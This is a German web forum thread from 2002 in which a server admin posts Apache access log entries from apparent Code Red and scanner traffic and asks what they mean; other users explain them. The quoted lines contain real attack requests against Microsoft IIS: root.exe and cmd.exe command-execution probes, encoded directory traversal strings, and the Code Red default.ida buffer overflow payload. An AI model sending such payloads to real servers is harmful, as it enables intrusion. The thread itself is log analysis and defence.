Scriptkid Kindereien aber dazu eine Frage !

Einklappen
X
 
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

  • Scriptkid Kindereien aber dazu eine Frage !

    80.139.135.172 - - [10/Jul/2002:09:57:26 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
    80.139.135.172 - - [10/Jul/2002:09:57:30 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274 "-" "-"
    80.139.135.172 - - [10/Jul/2002:09:57:35 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
    80.139.135.172 - - [10/Jul/2002:09:57:39 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
    Ein kleiner Auszug meines Apache Accesslogs, wie man sieht versucht wieder ein Scriptkid auf meinem Rechner die Wineingabeaufforderung zu bekommen *ggg* Wie dumm das ich garkein Windows laufen hab *gg* Wie auch immer die letzten beiden Zeilen sind ja cmd.exe das ist die Eingabeaufforgerung, aber was ist die root.exe ?? Davon hab ich noch nich gehört

    Man lernt halt nie aus, was ist das ?

  • #2
    hast du keine Firewall laufen?

    php-Entwicklung | ebiz-consult.de
    PHP-Webhosting für PHP Entwickler | ebiz-webhosting.de
    die PHP Marktplatz-Software | ebiz-trader.de

    Kommentar


    • #3
      hmm,

      ??
      Wieso damit keiner mehr an meinen Webserver kommt ?

      Kommentar


      • #4
        Auch auf einem Webserver kann man eine Firewall einrichten. Damit sowas erst garnicht den Serever in die Knie zwingen kann.
        *winks*
        Gilbert
        ------------------------------------------------
        Hilfe für eine Vielzahl von Problemen!!!
        http://www.1st-rootserver.de/

        Kommentar


        • #5
          Root.exe ist ein CodeRed Relikt. CodeRed kopiert die cmd.exe und legt diese als root.exe in ein Webserver-CGI-Verzeichnis um über den IIS darauf später auf die Maschine zugreifen zu können.

          Eine Firewall hilft für Schwachstellen dieser Art gar nix.

          Kommentar


          • #6
            hmm,

            davor hab ich nunmal wirklich keine Angst, weil eben garkein Windows läuft !

            Kommentar


            • #7
              Unter Linux ist man sicher sicherer.

              Kommentar


              • #8
                hmm,

                meistens, denn acuh dafür gibts rootkits aber naja, hier ist nur wenig zu holen irgendwie.
                Fasst mal einem nackten Mann in die Tasche

                Aber wieder was gelertn, also einer dieser COdeRed sachen

                Da ist aber noch was =>

                80.139.135.172 - - [10/Jul/2002:13:36:29 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
                80.139.135.172 - - [10/Jul/2002:13:36:36 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
                80.139.135.172 - - [10/Jul/2002:13:36:39 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
                80.139.135.172 - - [10/Jul/2002:13:36:47 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 "-" "-"
                Wo will der hin, in welches Verzeichnis ?

                Kommentar


                • #9
                  Erstmal ins Root von Windowds NT und dann auf die cmd.exe um den Server auszuspionieren.
                  *winks*
                  Gilbert
                  ------------------------------------------------
                  Hilfe für eine Vielzahl von Problemen!!!
                  http://www.1st-rootserver.de/

                  Kommentar


                  • #10
                    hmm,

                    aber was ist _mem_bin ?

                    Kommentar


                    • #11
                      Sind Ordner von Frontpage Webseiten.
                      *winks*
                      Gilbert
                      ------------------------------------------------
                      Hilfe für eine Vielzahl von Problemen!!!
                      http://www.1st-rootserver.de/

                      Kommentar


                      • #12
                        hmm,

                        *lol*

                        richtig kreativ so

                        Kommentar


                        • #13
                          Das dürfte aber eher ein Wurm sein als ein Kiddie?

                          Kommentar


                          • #14
                            hmm,

                            k.a.
                            so tief hab ich mit der Materie noch nicht befasst, aber wo sollte der meien IP her haben ?

                            aber noch was interssantes gefunden =>
                            65.189.139.113 - - [11/Jul/2002:12:45:44 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
                            NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u 9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 318 "-" "-"
                            was will der denn ?

                            Kommentar


                            • #15
                              Der will nen Buffer Overflow erzeugen, war ein Problem mit IIS vor dem panischen Patch, das MS irgendwann veröffentlicht hat.

                              IP: Die Würmer gehen m.W. IPs blockweise durch. Sogar in alten ISDN-Zeiten (also normalerweise nur ein paar Minuten mit der gleichen IP online!) hat mein lokaler Apache manchmal Code-Red-Versuche gemeldet.

                              Kommentar

                              Lädt...
                              X